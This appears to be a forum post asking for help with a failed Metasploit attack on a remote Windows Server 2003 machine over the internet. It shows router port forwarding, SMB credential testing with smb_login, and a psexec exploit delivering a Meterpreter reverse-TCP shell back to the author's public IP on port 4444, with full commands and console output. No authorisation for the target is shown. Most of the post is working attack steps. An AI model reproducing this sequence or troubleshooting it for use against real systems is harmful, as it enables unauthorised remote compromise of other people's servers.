Target OS: Windows 2003 SP2 EN
Target public IP: XX.XX.XX.XX
Target open port: 445
My OS: Windows 7
My public IP: YY.YY.YY.YY
My local IP: 192.168.2.42
My router: SMC
Due to the fact that the target is not on the same LAN, and the attack will be over the internet, I started by setting up port forwarding in the router settings as follows:
Name: AUTH - Protocol: TCP/UDP - WAN Port: 4444 - Server Host Port: 4444 - Server IP Address: 192.168.2.42
I installed Metasploit and started by checking whether the credentials are valid by running scanner/smb/smb_login as follows:
msf> use scanner/smb/smb_login
msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX
rhosts => XX.XX.XX.XX
msf auxiliary(smb_login) > set smbuser root
smbuser => root
msf auxiliary(smb_login) > set smbpass password
smbpass => password
msf auxiliary(smb_login) > run
[*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce
[-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported.
[-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE)
[-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE)
[*] Auth-User: "root"
[+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Then, after the successful login, I tried to use exploit/windows/smb/psexec to exploit the server as follows:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost XX.XX.XX.XX
rhost => XX.XX.XX.XX
msf exploit(psexec) > set smbuser root
smbuser => root
msf exploit(psexec) > set smbpass password
smbpass => password
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost YY.YY.YY.YY
lhost => YY.YY.YY.YY
msf exploit(psexec) > set lport 4444
lport => 4444
msf exploit(psexec) > exploit
[-] Handler failed to bind to YY.YY.YY.YY:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Connecting to the server...
[*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'...
[*] Uploading payload...
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
But as you can see, the exploit failed although the credentials are valid and confirmed above. Can you help me understand what's wrong with the above?